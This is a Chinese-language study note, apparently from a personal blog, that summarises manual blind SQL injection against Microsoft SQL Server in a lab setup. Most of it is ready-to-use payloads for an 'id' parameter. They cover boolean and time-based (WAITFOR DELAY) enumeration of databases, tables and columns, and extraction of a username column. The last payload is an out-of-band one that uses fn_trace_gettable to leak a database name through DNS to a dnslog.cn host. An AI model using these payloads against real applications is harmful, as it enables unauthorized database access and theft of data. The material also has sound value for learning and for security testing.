Mssql手工盲注小结

实验环境：
所有数据库名：

oa数据库所有表名

oa数据表Portal_Announcementscat：

布尔盲注：

---

猜测数据库数量：

先判断dbid字段是否存在：

# 这里bdid字段值一直到9都有效
id=1 and 1=(select count(*) from master.dbo.sysdatabases where dbid=5)

得到数据库名共有9个

根据dbid字段猜库名长度

# 这里的库名长度为12
id=1 and 1=(select count(*) from master.dbo.sysdatabases where dbid=5 and len(name)>4)

根据dbid字段挨个查询数据库名：

# 第一个字符为R，ASCII 码为82
id=1 and ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=5),1,1)) >81

# 查询第二个字符，以此类推
id=1 and ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=5),2,1)) >100

注释：

substring(str,start,len) 截取字符串的作用，第一个参数为要截取的字符串，第二个参数为从哪里开始截取，第三个参数为截取的长度
ascii(char) 把字符转换为ascii值

猜解表名长度：

# 查当前数据库的第一个表名长度
id=1 and 1=(select count(*) from sysobjects where name in (select top 1 name from sysobjects where xtype='u') and len(name)>22)
# 查当前数据库第二个表名长度，以此类推
id=1 and 1=(select count(*) from sysobjects where name in (select top 1 name from sysobjects where xtype='u' and name != 'Portal_Announcementscat')  and len(name)=20)

# 查其他数据库的第一个表名长度，例如通过上面的语句得到数据库名 DianCMS
id=1 and 1=(select count(*) from DianCMS.dbo.sysobjects where name in (select top 1 name from DianCMS.dbo.sysobjects where xtype='u') and len(name)>1)

猜解表名：

# 猜解第一个字符：P
id=1 and 1=(select count(*) from sysobjects where name in (select top 1 name from sysobjects where xtype='u') and ascii(substring(name,1,1))=80)
# 猜解第二个字符：o，以此类推
id=1 and 1=(select count(*) from sysobjects where name in (select top 1 name from sysobjects where xtype='u') and ascii(substring(name,2,1))=111)

# 得到第一个表名为 Portal_Announcementscat，查询下一个表名，以第三个表名为例，第一个字符为 u
id=1 and 1=(select count(*) from sysobjects where name in (select top 1 name from sysobjects where xtype='u' and name not in ('Portal_Announcementscat','Portal_Announcements')) and ascii(substring(name,1,1))=117)

猜解列名长度：

id=1 and exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'Portal_Announcementscat') and len(name)=5)
id=1 and 1=(select count(*) from syscolumns where id = (select id from sysobjects where name = 'Portal_Announcementscat')  and len(name)=5)

# 猜解下一列名长度：
id=1 and exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'Portal_Announcementscat') and name not in ('catid') and len(name)=8)

猜解列名：（推荐第一种语句）

第二个payload测试的时候发现一个问题，存在字段catid和moduleid，截取一个字段获取它的ascii值时，无论是c对应的ascii值99，还是m对应的ascii值109都能返回正确的页面，写盲注脚本的时候要注意这个问题或者换个payload，不建议使用exists

# 猜解列名第一个字符：c
id=1 and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='Portal_Announcementscat')),1,1)) =99
id=1 and exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'Portal_Announcementscat') and unicode(substring(name,1,1))=99)
# 猜解列名的第二个字符：a，以此类推
id=1 and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='Portal_Announcementscat')),2,1)) =97
id=1 and exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'Portal_Announcementscat') and unicode(substring(name,2,1))=97)

# 猜解其他列名，以此类推：
id=1 and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='Portal_Announcementscat') and name not in ('catid')),1,1)) =109

猜解数据：

# 判断opusername列第一个字符：a
id=1 and ascii(substring((select top 1 opusername from Portal_Announcementscat),1,1)) = 97
# 判断opusername列第二个字符：d，以此类推
id=1 and ascii(substring((select top 1 opusername from Portal_Announcementscat),2,1)) = 100

时间盲注：

---

示例：

WAITFOR DELAY '0:0:4' --  //表示延迟4秒

IF exists ()子句：

IF exists () WAITFOR DELAY '0:0:5'

判断是否存在时间盲注：

id=1 WAITFOR DELAY '0:0:5'--

判断数据库名是否存在：

# dbid 逐渐+1
id=1 if ((select count(*) from master.dbo.sysdatabases where dbid=5)=1) waitfor delay '0:0:3'--

猜库名长度：

id=1 if ((select count(*) from master.dbo.sysdatabases where dbid=9 and len(name)=2)=1) waitfor delay '0:0:5'--

猜数据库名：

# 猜第一个字符：o
id=1 if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=9),1,1)) = 111) WAITFOR DELAY '0:0:5'--
# 猜第二个字符：a，以此类推
id=1 if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=9),2,1)) = 97) WAITFOR DELAY '0:0:5'--

猜解表名长度：

# 通过上面语句得到数据名：oa
id=1 if ((select count(*) from oa.dbo.sysobjects where name in (select top 1 name from oa.dbo.sysobjects where xtype='u') and len(name)=23)=1) WAITFOR DELAY '0:0:5'--
# 查下一个表名长度，以此类推：
id=1 if ((select count(*) from oa.dbo.sysobjects where name in (select top 1 name from oa.dbo.sysobjects where xtype='u' and name not in ('Portal_Announcementscat')) and len(name)=20)=1) WAITFOR DELAY '0:0:5'--

猜解表名：

# 猜解第一个字符：P
id=1 if ((select count(*) from oa.dbo.sysobjects where name in (select top 1 name from oa.dbo.sysobjects where xtype='u') and ascii(substring(name,1,1))=80)=1) WAITFOR DELAY '0:0:5'--
# 猜解第二个字符：o，以此类推
id=1 if ((select count(*) from oa.dbo.sysobjects where name in (select top 1 name from oa.dbo.sysobjects where xtype='u') and ascii(substring(name,2,1))=111)=1) WAITFOR DELAY '0:0:5'--

# 猜解下一个表名：
id=1 if ((select count(*) from oa.dbo.sysobjects where name in (select top 1 name from oa.dbo.sysobjects where xtype='u' and name not in ('Portal_Announcementscat')) and ascii(substring(name,1,1))=80)=1) WAITFOR DELAY '0:0:5'--

猜解列名长度：

id=1 if(exists(select top 1 name from oa.dbo.syscolumns where id =(select id from oa.dbo.sysobjects where name = 'Portal_Announcementscat') and len(name)=5)) WAITFOR DELAY '0:0:5'--
id=1 if((select count(*) from oa.dbo.syscolumns where id =(select id from oa.dbo.sysobjects where name = 'Portal_Announcementscat') and len(name)=5)>0) WAITFOR DELAY '0:0:5'--
# 猜解下一个列名的长度
id=1 if(exists(select top 1 name from oa.dbo.syscolumns where id =(select id from oa.dbo.sysobjects where name = 'Portal_Announcementscat') and name not in ('catid') and len(name)=8)) WAITFOR DELAY '0:0:5'--

查询列名长度这处payload，可能会有多个相同长度的字段，目前的思路是先遍历一遍不同长度值，得到结果后写入集合，然后猜解列名的时候遍历集合。

猜解列名：

# 获取第一个字符：c
id=1 if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='Portal_Announcementscat')),1,1)) =99) WAITFOR DELAY '0:0:5'--
# 获取第二个字符：a，以此类推
id=1 if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='Portal_Announcementscat')),2,1)) =97) WAITFOR DELAY '0:0:5'--

# 猜解下一个列名：
id=1 if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='Portal_Announcementscat') and name not in ('catid')),1,1)) =109) WAITFOR DELAY '0:0:5'--

逐列猜解数据：

# 判断opusername列第一个字符：a
id=1 if (ascii(substring((select top 1 opusername from Portal_Announcementscat),1,1)) = 97) WAITFOR DELAY '0:0:5'--
# 判断opusername列第一个字符：d，以此类推
id=1 if (ascii(substring((select top 1 opusername from Portal_Announcementscat),2,1)) = 100) WAITFOR DELAY '0:0:5'--

OBB带外注入：

---

适用于所有MSSQL版本

id=1 and exists(select * from fn_trace_gettable('\\'+(select top 1 name from master..sysdatabases where dbid>4)+'.6etys1.dnslog.cn\1.trc',default))

后续计划：

---

有时间的话写一下盲注脚本，虽然感觉可能不太好写，我太菜了

参考如下

---

Microsoft SQL Server手注之布尔型盲注
Microsoft SQL Server手注之延时型时间盲注
MSSQL一种新的DNS带外的方式